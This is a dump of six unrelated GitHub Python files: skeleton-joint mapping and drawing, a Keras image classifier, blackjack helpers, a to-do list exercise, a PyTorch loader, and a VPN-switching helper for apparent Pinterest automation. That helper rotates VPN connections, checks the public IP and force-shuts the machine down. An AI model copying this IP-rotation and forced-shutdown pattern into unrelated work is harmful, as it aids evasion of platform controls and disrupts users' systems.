{"seq_id":"17318799043","text":"\nimport numpy as np\nimport cv2\nimport time\nfrom pyVideoDatasets.DepthUtils import skel2depth, depth2world, world2depth\n\nN_MSR_JOINTS = 20\nN_KINECT_JOINTS = 14\n\n\ndef transform_skels(skels, transformation, output='image'):\n    '''\n    ---Parameters---\n    skels : list of skeletons in frame 1\n    transformation : 4x4 transform from frame 1 to 2\n    output : 'image' or 'world' for either coordinate system\n    ---Result---\n    skels_out : skeletons in frame 2\n    '''\n    skels_out = []\n    for skel_c1 in skels:\n        if np.all(skel_c1 != -1):\n            skels_mask = skel_c1 == 0\n            # Convert to depth coordinate system\n            skel_c1 = depth2world(skel2depth(skel_c1, [240,320]), [240,320])\n            # Transform from cam1 -> cam2\n            skel_c2 = np.dot(transformation[:3,:3], skel_c1.T).T + transformation[:3,3]\n\n            if len(skel_c2) != N_MSR_JOINTS:\n                skel_c2 = kinect_to_msr_skel(skel_c2)\n\n            skel_c2[skels_mask] = 0\n\n            if output=='world':\n                skels_out += [skel_c2]\n            elif output=='image':\n                # Get skel in image (cam2) coordinates\n                skel_im2 = world2depth(skel_c2, [240,320])\n                skels_out += [skel_im2]\n\n\n    return skels_out\n\n\n# ----------------------------------------------------------------\ndef 
kinect_to_msr_skel(skel):\n # SKEL_JOINTS = [0, 2, 3, 4, 5, 7, 8, 9, 11, 13, 15, 17, 19] # Low\n\n skel_msr = np.zeros([N_MSR_JOINTS, 3])\n skel_msr[3,:] = skel[0,:] #head\n skel_msr[1,:] = skel[1,:] #torso\n skel_msr[0,:] = skel[1,:] #torso\n skel_msr[4,:] = skel[2,:] #l shoulder\n skel_msr[5,:] = skel[3,:] #l elbow\n skel_msr[7,:] = skel[4,:] #l hand\n skel_msr[8,:] = skel[5,:] #r shoudler\n skel_msr[9,:] = skel[6,:] #r elbow\n skel_msr[11,:] = skel[7,:] #r hand\n skel_msr[12,:] = skel[8,:] #l hip\n skel_msr[13,:] = skel[9,:] #l knee\n skel_msr[15,:] = skel[10,:] #l foot\n skel_msr[16,:] = skel[11,:] #r hip\n skel_msr[17,:] = skel[12,:] #r knee\n skel_msr[19,:] = skel[13,:] #r foot\n\n return skel_msr.astype(np.int16)\n\ndef msr_to_kinect_skel(skel):\n # SKEL_JOINTS = [0, 2, 3, 4, 5, 7, 8, 9, 11, 13, 15, 17, 19] # Low\n\n skel_kinect = np.zeros([N_KINECT_JOINTS, 3], dtype=np.int16)\n skel_kinect[0,:] = skel[3,:] #head\n # skel_kinect[1,:] = skel[1,:] #torso\n skel_kinect[1,:] = skel[0,:] #torso\n skel_kinect[2,:] = skel[4,:] #l shoulder\n skel_kinect[3,:] = skel[5,:] #l elbow\n skel_kinect[4,:] = skel[7,:] #l hand\n skel_kinect[5,:] = skel[8,:] #r shoudler\n skel_kinect[6,:] = skel[9,:] #r elbow\n skel_kinect[7,:] = skel[11,:] #r hand\n skel_kinect[8,:] = skel[12,:] #l hip\n skel_kinect[9,:] = skel[13,:] #l knee\n skel_kinect[10,:] = skel[15,:] #l foot\n skel_kinect[11,:] = skel[16,:] #r hip\n skel_kinect[12,:] = skel[17,:] #r knee\n skel_kinect[13,:] = skel[17,:] #r foot\n\n return skel_kinect\n\ndef mhad_to_kinect_skel(skel):\n # SKEL_JOINTS = [0, 2, 3, 4, 5, 7, 8, 9, 11, 13, 15, 17, 19] # Low\n dims = skel.shape[1]\n skel_kinect = np.zeros([N_KINECT_JOINTS, dims], dtype=np.int16)\n\n if skel[2,0]!=0: #head\n skel_kinect[0,:] = skel[2,:]\n else:\n try:\n skel_kinect[0,:] = skel[0:3,:][np.argwhere(skel[0:3,2]!=0)[0]]\n except:\n pass\n\n if skel[3,0]!=0:#torso\n skel_kinect[1,:] = skel[3,:]\n else:\n try:\n skel_kinect[1,:] = skel[[3,4,6],:][np.argwhere(skel[[3,4,6],2]!=0)[0]]\n except:\n pass\n\n skel_kinect[2,:] = skel[12,:] #l shoulder\n skel_kinect[3,:] = skel[13,:] #l elbow\n # skel_kinect[4,:] = skel[15,:] if skel[15,0]!=0 else np.max(skel[16:19,:], 0) #l hand\n if skel[15,0]!=0: #l hand\n skel_kinect[4,:] = skel[15,:]\n else:\n try:\n skel_kinect[4,:] = skel[16:19,:][np.argwhere(skel[16:19,2]!=0)[0]]\n except:\n pass\n\n skel_kinect[5,:] = skel[20,:] #r shoudler\n skel_kinect[6,:] = skel[21,:] #r elbow\n # skel_kinect[7,:] = skel[23,:] if skel[23,0]!=0 else np.max(skel[23:27,:], 0) #r hand\n if skel[23,0]!=0:#r hand\n skel_kinect[7,:] = skel[23,:]\n else:\n try:\n skel_kinect[7,:] = skel[23:27,:][np.argwhere(skel[23:27,2]!=0)[0]]\n except:\n pass\n\n skel_kinect[8,:] = skel[28,:] #l hip\n skel_kinect[9,:] = skel[31,:] #l knee\n skel_kinect[10,:] = skel[33,:] if skel[33,0]!=0 else skel[34,:] #l foot\n skel_kinect[11,:] = skel[37,:] #r hip\n skel_kinect[12,:] = skel[39,:] #r knee\n skel_kinect[13,:] = skel[41,:] if skel[41,0]!=0 else skel[42,:] #r foot\n # print skel_kinect\n return skel_kinect\n\n# def mhad_to_kinect_skel(skel):\n# # SKEL_JOINTS = [0, 2, 3, 4, 5, 7, 8, 9, 11, 13, 15, 17, 19] # Low\n# dims = skel.shape[1]\n# skel_kinect = np.zeros([N_KINECT_JOINTS, dims], dtype=np.int16)\n# skel_kinect[0,:] = skel[2,:] if skel[2,0]!=0 else np.max(skel[0:3,:], 0) #head\n# skel_kinect[1,:] = skel[3,:] if skel[3,0]!=0 else np.max(skel[[3,4,7,8,19],:], 0)#torso\n# skel_kinect[2,:] = skel[12,:] #l shoulder\n# skel_kinect[3,:] = skel[13,:] #l elbow\n# skel_kinect[4,:] = skel[15,:] if 
skel[15,0]!=0 else np.max(skel[16:19,:], 0) #l hand\n# skel_kinect[5,:] = skel[20,:] #r shoudler\n# skel_kinect[6,:] = skel[21,:] #r elbow\n# skel_kinect[7,:] = skel[23,:] if skel[23,0]!=0 else np.max(skel[23:27,:], 0) #r hand\n# skel_kinect[8,:] = skel[28,:] #l hip\n# skel_kinect[9,:] = skel[31,:] #l knee\n# skel_kinect[10,:] = skel[33,:] if skel[33,0]!=0 else skel[34,:] #l foot\n# skel_kinect[11,:] = skel[37,:] #r hip\n# skel_kinect[12,:] = skel[39,:] #r knee\n# skel_kinect[13,:] = skel[41,:] if skel[41,0]!=0 else skel[42,:] #r foot\n# # print skel_kinect\n# return skel_kinect\n\ndef j11_to_kinect_skel(skel):\n skel_kinect = np.zeros([N_KINECT_JOINTS, 3], dtype=np.int16)\n skel_kinect[0,:] = skel[0,:] #head\n skel_kinect[2,:] = skel[1,:] #l shoulder\n skel_kinect[3,:] = skel[2,:] #l elbow\n skel_kinect[4,:] = skel[3,:] #l hand\n skel_kinect[5,:] = skel[4,:] #r shoudler\n skel_kinect[6,:] = skel[5,:] #r elbow\n skel_kinect[7,:] = skel[6,:] #r hand\n skel_kinect[9,:] = skel[7,:] #l knee\n skel_kinect[10,:] = skel[8,:] #l foot\n skel_kinect[12,:] = skel[9,:] #r knee\n skel_kinect[13,:] = skel[10,:] #r foot\n return skel_kinect\n\ndef j13_to_kinect_skel(skel):\n skel_kinect = np.zeros([N_KINECT_JOINTS, 3], dtype=np.int16)\n skel_kinect[0,:] = skel[0,:] #head\n skel_kinect[2,:] = skel[1,:] #l shoulder\n skel_kinect[3,:] = skel[2,:] #l elbow\n skel_kinect[4,:] = skel[3,:] #l hand\n skel_kinect[5,:] = skel[4,:] #r shoudler\n skel_kinect[6,:] = skel[5,:] #r elbow\n skel_kinect[7,:] = skel[6,:] #r hand\n skel_kinect[8,:] = skel[7,:] #l hip\n skel_kinect[9,:] = skel[8,:] #l knee\n skel_kinect[10,:] = skel[9,:] #l foot\n skel_kinect[11,:] = skel[10,:] #r hip\n skel_kinect[12,:] = skel[11,:] #r knee\n skel_kinect[13,:] = skel[12,:] #r foot\n return skel_kinect\n\ndef j14_to_kinect_skel(skel):\n skel_kinect = np.zeros([N_KINECT_JOINTS, 3], dtype=np.int16)\n skel_kinect[0,:] = skel[0,:] #head\n skel_kinect[1,:] = skel[1,:] #torso\n skel_kinect[2,:] = skel[2,:] #l shoulder\n skel_kinect[3,:] = skel[3,:] #l elbow\n skel_kinect[4,:] = skel[4,:] #l hand\n skel_kinect[5,:] = skel[5,:] #r shoudler\n skel_kinect[6,:] = skel[6,:] #r elbow\n skel_kinect[7,:] = skel[7,:] #r hand\n skel_kinect[8,:] = skel[8,:] #l hip\n skel_kinect[9,:] = skel[9,:] #l knee\n skel_kinect[10,:] = skel[10,:] #l foot\n skel_kinect[11,:] = skel[11,:] #r hip\n skel_kinect[12,:] = skel[12,:] #r knee\n skel_kinect[13,:] = skel[13,:] #r foot\n return skel_kinect\n\ndef j15_to_kinect_skel(skel):\n skel_kinect = np.zeros([N_KINECT_JOINTS, 3], dtype=np.int16)\n skel_kinect[0,:] = skel[0,:] #head\n skel_kinect[1,:] = skel[2,:] #torso\n skel_kinect[2,:] = skel[3,:] #l shoulder\n skel_kinect[3,:] = skel[4,:] #l elbow\n skel_kinect[4,:] = skel[5,:] #l hand\n skel_kinect[5,:] = skel[6,:] #r shoudler\n skel_kinect[6,:] = skel[7,:] #r elbow\n skel_kinect[7,:] = skel[8,:] #r hand\n skel_kinect[8,:] = skel[9,:] #l hip\n skel_kinect[9,:] = skel[10,:] #l knee\n skel_kinect[10,:] = skel[11,:] #l foot\n skel_kinect[11,:] = skel[12,:] #r hip\n skel_kinect[12,:] = skel[13,:] #r knee\n skel_kinect[13,:] = skel[14,:] #r foot\n return skel_kinect\n\nfrom skimage.draw import circle, line\ndef display_skeletons(img, skel, color=(200,0,0), skel_type='MSR', skel_contraints=None):\n '''\n skel_type : 'MSR' or 'Low' ##or 'Upperbody'\n '''\n\n if img.shape[0] == 480:\n pt_radius = 6\n tube_radius = 3\n else:\n pt_radius = 5\n tube_radius = 2\n\n img = np.ascontiguousarray(img)\n if skel_type == 'MSR':\n joints = range(N_MSR_JOINTS)\n joint_names = ['torso1', 
'torso2', 'neck', 'head',\n                    'r_shoulder', 'r_elbow', 'r_wrist', 'r_hand',\n                    'l_shoulder', 'l_elbow', 'l_wrist', 'l_hand',\n                    'r_pelvis', 'r_knee', 'r_ankle', 'r_foot',\n                    'l_pelvis', 'l_knee', 'l_ankle', 'l_foot'\n                    ]\n        connections = [\n                    [3, 2],[2,1],[1,0], #Head to torso\n                    [2, 4],[4,5],[5,6],[6,7], # Left arm\n                    [2, 8],[8,9],[9,10],[10,11], # Right arm\n                    [0,12],[12,13],[13,14],[14,15], #Left foot\n                    [0,16],[16,17],[17,18],[18,19] #Right foot\n                    ]\n        head = 3\n    elif skel_type == 'Low':\n        joints = [0, 3, 4, 5, 7, 8, 9, 11, 13, 15, 17, 19] # Low\n        # joints = [0, 2, 3, 4, 5, 7, 8, 9, 11, 13, 15, 17, 19]\n        # joints = [0, 1, 2, 3, 4, 5, 7, 8, 9, 11, 13, 15, 17, 19]\n        connections = [\n                    # [3, 2],[2,0], #Head to torso\n                    [3, 0], #Head to torso\n                    # [3, 2],[2,1],[1,0], #Head to torso\n                    [4,8], #connect shoulders\n                    [0, 4],[4,5],[5,7], # Left arm\n                    [0, 8],[8,9],[9,11], # Right arm\n                    [0,13],[13,15], #Left foot\n                    [0,17],[17,19]\n                    ]\n        head = 3\n    elif skel_type == 'Upperbody':\n        joints = [0, 3, 4, 5, 7, 8, 9, 11]\n        # joints = [0, 1, 2, 3, 4, 5, 7, 8, 9, 11]\n        connections = [\n                    [3,0], #Head to torso\n                    [0, 4],[4,5],[5,7], # Left arm\n                    [4,8], #connect shoulders\n                    [0, 8],[8,9],[9,11], # Right arm\n                    ]\n        head = 3\n\n    elif skel_type == 'Kinect':\n        joints = range(14)\n        connections = [\n                    [0,1], #Head to torso\n                    [1,2],[2,3],[3,4], # Left arm\n                    [2,5],# connect shoulders\n                    [1,5],[5,6],[6,7], # Right arm\n                    [1,8],[8,9],[9,10], #Left foot\n                    [1,11],[11,12],[12,13], #Right foot\n                    [8,11] #Bridge hips\n                    ]\n        joint_names = ['head', 'torso', 'l_shoulder', 'l_elbow', 'l_hand',\n                    'r_shoulder', 'r_elbow', 'r_hand',\n                    'l_hip', 'l_knee', 'l_foot',\n                    'r_hip', 'r_knee', 'r_foot']\n        head = 0\n    elif skel_type == 'Ganapathi':\n        joints = range(15)\n        connections = [\n                    [0,1],[1,2],#Head to neck, neck to torso\n                    [1,3],[3,4],[4,5], # Left arm\n                    [3,9],[6,12], # shoulders to hips\n                    [1,6],[6,7],[7,8], # Right arm\n                    [2,9],[9,10],[10,11], #Left foot\n                    [2,12],[12,13],[13,14], #Right foot\n                    [9,12] #Bridge hips\n                    ]\n        joint_names = ['head', 'neck', 'torso', 'l_shoulder', 'l_elbow', 'l_hand',\n                    'r_shoulder', 'r_elbow', 'r_hand',\n                    'l_hip', 'l_knee', 'l_foot',\n                    'r_hip', 'r_knee', 'r_foot']\n        head = 0\n    elif skel_type == 'MHAD':\n        joints = range(43)\n        connections = [\n                    [0,1],[0,2], #Head to torso\n                    [1,2],[2,3],[3,4], # Left arm\n                    [2,5],# connect shoulders\n                    [1,5],[5,6],[6,7], # Right arm\n                    [1,8],[8,9],[9,10], #Left foot\n                    [1,11],[11,12],[12,13], #Right foot\n                    [8,11] #Bridge hips\n                    ]\n        joint_names = ['head', 'torso', 'l_shoulder', 'l_elbow', 'l_hand',\n                    'r_shoulder', 'r_elbow', 'r_hand',\n                    'l_hip', 'l_knee', 'l_foot',\n                    'r_hip', 'r_knee', 'r_foot']\n        head = 0\n\n    elif skel_type == 'Other':\n        joints = range(len(skel))\n        connections = skel_contraints\n        head = 0\n\n    for i in joints:\n        j = skel[i]\n        # Remove zero nodes\n        try:\n            if not (j[0] <= 0 or j[1] <= 0):\n                # circ = skimage.draw.circle(j[0],j[1], 5)\n                # img[circ[0], circ[1]] = color\n                cv2.circle(img, (j[1], j[0]), pt_radius, color, -1)\n        except:\n            pass\n\n    # Make head a bigger node\n    cv2.circle(img, (skel[head,1], skel[head,0]), pt_radius*3, color)\n\n    for c in connections:\n        # Remove zero nodes\n        if not ( (skel[c[0],0]==0 and skel[c[0],1]==0) or (skel[c[1],0]==0 and skel[c[1],1]==0)):\n        # if not ( (skel[c[0],0]<=0 and skel[c[0],1]<=0) or (skel[c[1],0]<=0 and skel[c[1],1]<=0)):\n            cv2.line(img, (skel[c[0],1], skel[c[0],0]), (skel[c[1],1], skel[c[1],0]), color, tube_radius)\n\n    return 
img\n","repo_name":"colincsl/RGBD-Dataset-Reader","sub_path":"pyVideoDatasets/SkeletonUtils.py","file_name":"SkeletonUtils.py","file_ext":"py","file_size_in_byte":13765,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"32"} +{"seq_id":"1071677865","text":"\nimport json, os, re, sys, time\nimport numpy as np\n\nfrom keras import backend as K\nfrom keras.applications.imagenet_utils import preprocess_input\nfrom keras.models import load_model\nfrom keras.preprocessing import image\n\n\ndef predict(img_path, model):\n img = image.load_img(img_path, target_size=(224, 224))\n x = image.img_to_array(img)\n x = np.expand_dims(x, axis=0)\n preds = model.predict(x)\n return preds\n\n\nCLASS_INDEX = None\nJSON_PATH = \"idenprof_model_class.json\"\n\n\ndef decode_predictions(preds, top=5, model_json=\"\"):\n global CLASS_INDEX\n\n if CLASS_INDEX is None:\n CLASS_INDEX = json.load(open(model_json))\n results = []\n for pred in preds:\n top_indices = pred.argsort()[-top:][::-1]\n for i in top_indices:\n each_result = []\n each_result.append(CLASS_INDEX[str(i)])\n each_result.append(pred[i])\n results.append(each_result)\n\n return results\n\n\n\nif __name__ == '__main__':\n model_path = \"resnet50_best.h5\"\n print('Loading model:', model_path)\n t0 = time.time()\n model = load_model(model_path)\n t1 = time.time()\n print('Loaded in:', t1-t0)\n\n test_path = \"7032-2.jpg\"\n print('Generating predictions on image:', test_path)\n preds = predict(test_path, model)\n predictiondata = decode_predictions(preds, top=int(1), model_json=JSON_PATH)\n print(predictiondata)\n #model.summary()","repo_name":"maxVeremchuk/courseWork","sub_path":"imageRecognition/doorImages/resnet50model_predict.py","file_name":"resnet50model_predict.py","file_ext":"py","file_size_in_byte":1415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"35170279264","text":"import random\nfrom karta import Karta\n\n\ndef utworz_talie():\n \"\"\"Tworzy talię 54 kart\"\"\"\n\n kolory = [\"Trefl\", \"Karo\", \"Kier\", \"Pik\"]\n figury = {\n \"2\": 2,\n \"3\": 3,\n \"4\": 4,\n \"5\": 5,\n \"6\": 6,\n \"7\": 7,\n \"8\": 8,\n \"9\": 9,\n \"10\": 10,\n \"Jopek\": 10,\n \"Dama\": 10,\n \"Król\": 10,\n \"As\": 11,\n }\n talia_lista = []\n\n for kolor in kolory:\n for figura in figury:\n karta = Karta(kolor, figura, figury[figura])\n talia_lista.append(karta)\n\n return talia_lista\n\n\ndef hit_or_stay():\n \"\"\"Decyzja o dalszym dokładaniu kart\"\"\"\n\n decision = input(\"Chcesz dalej dokładać karty? Wpisz 'T' lub 'N':\")\n return decision\n\n\ndef bet():\n \"\"\"Określa kwotę betu\"\"\"\n\n amount = input(\"Ile chciałłbyś postawić? Wpisz kwotę:\")\n return int(amount)\n\n\ndef tasuj(talia):\n \"\"\"Tasuje talię\"\"\"\n\n random.shuffle(talia)\n\n return talia\n\n\ndef imie_gracza():\n \"\"\"Nadanie imienia graczowi, wyświetlenie powitania\"\"\"\n imie = input(\"Witaj w grze Blackjack, jak się nazywasz?\")\n print(\n f\"Cześć {imie}. Będziesz grał przeciwko komputerowi o imieniu Bernard. Powodzenia!\"\n )\n gracze = [imie, \"Bernard\"]\n\n return gracze\n\n\ndef starting_bankroll(gracz, komputer):\n \"\"\"Określenie depozytu początkowego\"\"\"\n\n numbers = \"0123456789\"\n validformat = False\n while validformat == False:\n suma = input(\"Jaką kwotę pieniędzy przyznać na początku każdemu z graczy?\")\n validformat = True\n for i in suma:\n if i not in numbers:\n validformat = False\n print(\"Początkowa kwota musi być liczbą dodatnią! 
Spróbuj jeszcze raz!\")\n break\n if suma == \"0\":\n print(\"Kwota nie może być równa 0! Spróbuj jeszcze raz!\")\n validformat = False\n\n print(f\"Depozyt gacza {gracz} został zasilony kwotą {suma} $.\")\n print(f\"Depozyt komputera {komputer} został zasilony kwotą {suma} $.\")\n\n return int(suma)\n\n\ndef suma_gracza_check(gracz, sumka, przeciwnik, pula):\n \"\"\"Monitorowanie sumy kart gracza\"\"\"\n\n if sumka > 21:\n print(\n f\"Suma gracza {gracz} przekroczyła 21 punktów i wynosi {sumka}. {przeciwnik} wygrywa i zgarnia {pula} $.\"\n )\n return False\n else:\n return True\n\n\ndef stawkafn(graczdepo, komputerdepo):\n \"\"\"Określenie stawki danej partii\"\"\"\n\n lista = list((graczdepo, komputerdepo))\n numbers = \"0123456789\"\n kwota = False\n while kwota == False:\n stawka = input(\"Jaką kwotę chciałbyś postawić?\")\n kwota = True\n for x in stawka:\n if x not in numbers:\n print(\"Kwota stawki musi być liczbą dodatnią!\")\n kwota = False\n if int(stawka) <= komputerdepo and int(stawka) <= graczdepo:\n return int(stawka)\n else:\n print(\n f\"Zbyt duża kwota! Stawka nie może przekraczać depozytu gracza z najmniejszymi środkami. Wybierz kwotę od 0 do {min(lista)}.\"\n )\n","repo_name":"Ravdar/blackjack","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3089,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"9264955179","text":"import re\nimport time\nimport requests\nimport subprocess\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\n\n\ndef explicit_wait(driver, track, ec_params, timeout=35, notify=True):\n if not isinstance(ec_params, list):\n ec_params = [ec_params]\n\n # find condition according to the tracks\n if track == \"VOEL\":\n elem_address, find_method = ec_params\n ec_name = \"visibility of element located\"\n\n find_by = (By.XPATH if find_method == \"XPath\" else\n By.CSS_SELECTOR if find_method == \"CSS\" else\n By.CLASS_NAME)\n locator = (find_by, elem_address)\n condition = EC.visibility_of_element_located(locator)\n\n elif track == \"TC\":\n expect_in_title = ec_params[0]\n ec_name = \"title contains '{}' string\".format(expect_in_title)\n\n condition = EC.title_contains(expect_in_title)\n\n elif track == \"SO\":\n ec_name = \"staleness of\"\n element = ec_params[0]\n condition = EC.staleness_of(element)\n\n # generic wait block\n try:\n wait = WebDriverWait(driver, timeout)\n result = wait.until(condition)\n\n except:\n if notify is True:\n print(\n \"Timed out with failure while explicitly waiting until {}!\\n\"\n .format(ec_name))\n return False\n\n return result\n\n\ndef check_vpn(execute_path):\n p = subprocess.Popen('cmd.exe /c' + '%s\\\\boot\\\\checkvpn.bat abc' % execute_path,\n stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n curline = p.stdout.readline()\n while curline != b'':\n curlines = str(curline).replace('\\\\r\\\\n', '')\n curline = p.stdout.readline()\n p.wait()\n print(curlines)\n if curlines != \"b'network is OK'\":\n return 0\n else:\n return 1\n\n\ndef rasphone_vpn(execute_path):\n p = subprocess.Popen(\"cmd.exe /c\" + '%s\\\\boot\\\\rasphonevpn.bat abc' % execute_path,\n stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n curline = p.stdout.readline()\n while curline != b'':\n # print(curline)\n curline1 = str(curline).replace(\"\\\\r\\\\n\", \"\")\n curline = p.stdout.readline()\n p.wait()\n\n\ndef get_public_ip(agent):\n 
headers = {\n 'User-Agent': agent,\n }\n url = \"http://200019.ip138.com/\"\n r = requests.get(url, headers=headers)\n ip_text = (r.text).strip()\n ip = re.search(r'\\d+.\\d+.\\d+.\\d+', ip_text).group()\n print('IP:', ip)\n\n return ip\n\n\ndef write_txt_time():\n time_hour = int(time.strftime('%H', time.localtime(time.time()))) * 3600\n time_min = int(time.strftime('%M', time.localtime(time.time()))) * 60\n time_sec = int(time.strftime('%S', time.localtime(time.time())))\n time_str = str(time_hour + time_min + time_sec)\n with open('.\\\\boot\\\\config_time.txt', 'w', encoding='utf-8') as fp:\n fp.write(time_str)\n\n\ndef connect_vpn(conn, agent, vpn, execute_path):\n sql = \"SELECT account, pwd, server, ip FROM vpn WHERE account=%s\"\n result = conn.op_select_one(sql, vpn)\n if result:\n vpn = result['account']\n vpn_pwd = result['pwd']\n vpn_ip = result['ip']\n vpn_server = result['server'].replace('.lianstone.net', '')\n with open(\"%s\\\\boot\\\\vpn.txt\" % execute_path, \"w\", encoding='utf-8') as fp:\n print(vpn_server + \",\" + vpn)\n fp.write(vpn_server + ',' + vpn + ',' + vpn_pwd)\n else:\n print(\n 'No corresponding VPN account has been detected and the system is being shut down...')\n time.sleep(600)\n os.system('Shutdown -s -t 0')\n print('Disconnect the original VPN connection')\n rasphone_vpn(execute_path)\n write_txt_time()\n print('Handling new VPN...')\n check_vpn(execute_path)\n public_ip = get_public_ip(agent)\n write_txt_time()\n while True:\n if public_ip == vpn_ip:\n print('VPN connection IP is correct!')\n break\n else:\n check_vpn(execute_path)\n write_txt_time()\n time.sleep(10)\n public_ip = get_public_ip(agent)","repo_name":"print-hello/Automation","sub_path":"pinterest/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":4175,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"29597702068","text":"# -------------------------------------------------#\n# Title: Working with Dictionaries\n# Dev: RRoot\n# Date: July 16, 2012\n# ChangeLog: (Who, When, What)\n# RRoot, 11/02/2016, Created starting template\n# AlyssaMatthews, 10/27/2017, Added code to complete assignment 5\n# -------------------------------------------------#\n\n# -- Data --#\n# objFile = An object that represents a file\n# strData = A row of text data from the file\n# dicRow = A row of data separated into elements of a dictionary {Task,Priority}\n# lstTable = A dictionary that acts as a 'table' of rows\n# strMenu = A menu of user options\n# strChoice = Capture the user option selection\n# strNewTask = A new task entry provided by the user\n# strNewPriority = A new priority entry provided by the user\n# strTask = A string to use when searching for an existing task\n# boolTaskFound = Boolean flag for noting when a task exists in the list\n\n# -- Input/Output --#\n# User can see a Menu (Step 2)\n# User can see data (Step 3)\n# User can insert or delete data(Step 4 and 5)\n# User can save to file (Step 6)\n\n# -- Processing --#\n# Step 1\n# When the program starts, load the any data you have\n# in a text file called ToDo.txt into a python Dictionary.\n\n# Step 2\n# Display a menu of choices to the user\n\n# Step 3\n# Display all todo items to user\n\n# Step 4\n# Add a new item to the list/Table\n\n# Step 5\n# Remove a new item to the list/Table\n\n# Step 6\n# Save tasks to the ToDo.txt file\n\n# Step 7\n# Exit program\n# -------------------------------\n\nstrData = \"\"\ndicRow = {}\nlstTable = []\n\n# Step 1 - Load data from a 
file\nobjFile = open(\"ToDo.txt\", \"r\")\nfor line in objFile:\n strData = line\n dicRow = {\"task\": (strData.split(\",\")[0]).strip(), \"priority\": (strData.split(\",\")[1]).strip()}\n lstTable.append(dicRow)\nobjFile.close()\n\n\n# Step 2 - Display a menu of choices to the user\nwhile (True):\n print(\"\"\"\n Menu of Options\n 1) Show current data\n 2) Add a new item\n 3) Remove an existing item\n 4) Save Data to File\n 5) Exit Program\n \"\"\")\n strChoice = str(input(\"Which option would you like to perform? [1 to 4] - \"))\n print() # adding a new line\n\n # Step 3 -Show the current items in the table\n if (strChoice.strip() == '1'):\n for dicRow in lstTable:\n print(dicRow[\"task\"] + \",\" + dicRow[\"priority\"])\n continue\n\n # Step 4 - Add a new item to the list/Table\n elif (strChoice.strip() == '2'):\n strNewTask = input(\"Enter a task: \")\n strNewPriority = input(\"Enter the task's priority: \")\n dicRow = {\"task\": strNewTask.title(), \"priority\": strNewPriority.lower()}\n lstTable.append(dicRow)\n continue\n\n # Step 5 - Remove a new item from the list/Table\n elif (strChoice == '3'):\n strTask = input(\"Enter the task you wish to remove: \")\n boolTaskFound = False\n if len(lstTable):\n for dicRow in lstTable:\n if strTask.title() in dicRow[\"task\"]:\n lstTable.remove(dicRow)\n boolTaskFound = True\n print(\"The task\", strTask.title(), \"has been removed\")\n if not boolTaskFound:\n print(\"Task not found\")\n continue\n\n # Step 6 - Save tasks to the ToDo.txt file\n elif (strChoice == '4'):\n objFile = open(\"ToDo.txt\", \"w\")\n if len(lstTable):\n for dicRow in lstTable:\n objFile.write(dicRow[\"task\"] + \",\" + dicRow[\"priority\"] + \"\\n\")\n print(\"Data saved\")\n else:\n print(\"No entries found\")\n objFile.close()\n continue\n\n elif (strChoice == '5'):\n break # and Exit the program\n\n","repo_name":"etwum/Python-Portfolio","sub_path":"Intro_to_Python/Module 05/Peer Review/Assignment05_AlyssaMatthews.py","file_name":"Assignment05_AlyssaMatthews.py","file_ext":"py","file_size_in_byte":3643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"8681545198","text":"#!/usr/bin/env python\r\n#!-*-coding:utf-8 -*-\r\n\"\"\"\r\n@version: python3.7\r\n@author: v-enshi\r\n@license: Apache Licence \r\n@contact: 123@qq.com\r\n@site: \r\n@software: PyCharm\r\n@file: train_eval_test.py\r\n@time: 2019/4/28 14:45\r\n\"\"\"\r\n\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nimport torch.optim as optim\r\nimport pickle\r\nimport random\r\nimport numpy as np\r\nimport time\r\ntorch.manual_seed(1)\r\nimport torch.nn.utils.rnn as rnn_utils\r\nfrom torch.utils.data import DataLoader\r\nimport torch.utils.data as data\r\n\r\nfrom model import main_model\r\n\r\ntime_start = time.time()\r\n\r\nuse_gpu = False\r\nuse_gpu = True\r\n\r\n##1. 
parameters setting\r\nif use_gpu:\r\n device = torch.device(\"cuda\")\r\n max_vocab_size = 50000\r\n CONTEXT_WINDOW = 100\r\n EMBEDDING_value = 512\r\n EMBEDDING_type = 256\r\n HIDDEN_SIZE = 512\r\n BATCH_SIZE = 10\r\n\r\nelse:\r\n device = torch.device(\"cpu\")\r\n max_vocab_size = 100\r\n CONTEXT_WINDOW = 100\r\n EMBEDDING_value = 2\r\n EMBEDDING_type = 3\r\n HIDDEN_SIZE = 5\r\n BATCH_SIZE = 2\r\n\r\n# 2.data loading\r\nclass MyData(data.Dataset):\r\n def __init__(self,data_seq, input_value, input_type, target, parent):\r\n self.input_value = input_value\r\n self.input_type = input_type\r\n self.target = target\r\n self.parent = parent\r\n self.length = len(self.target)\r\n self.data_length = [len(sq) for sq in data_seq]\r\n\r\n\r\n def __len__(self):\r\n return self.length\r\n\r\n def __getitem__(self, idx):\r\n return self.input_type[idx],self.input_value[idx], self.data_length[idx], self.target[idx], self.parent[idx]\r\n#vocabulary\r\nwith np.load(r\"../data/python/vocabulary_trainAndeval_50k.npz\", allow_pickle=True) as arr:\r\n value_vocab = arr['value_vocab'].item()\r\n type_vocab = arr['type_vocab'].item()\r\n\r\n#train\r\n\r\nwith np.load(r\"../data/python/train.npz\", allow_pickle=True) as arr:\r\n input_value = arr['input_value']\r\n input_type = arr['input_type']\r\n parent = arr['parent']\r\n target = arr['target']\r\n\r\n'''\r\nx_train = rnn_utils.pad_sequence(input_value_train, batch_first=True)\r\ny_train = rnn_utils.pad_sequence(input_type_train, batch_first=True)\r\ndataAll_train = MyData(input_value_train, x_train, y_train, target_train, parent_train)\r\n\r\n'''\r\n\r\nprint( input_value)\r\n","repo_name":"s1530129650/Code_Recommendation","sub_path":"source code/train_eval_test.py","file_name":"train_eval_test.py","file_ext":"py","file_size_in_byte":2272,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} 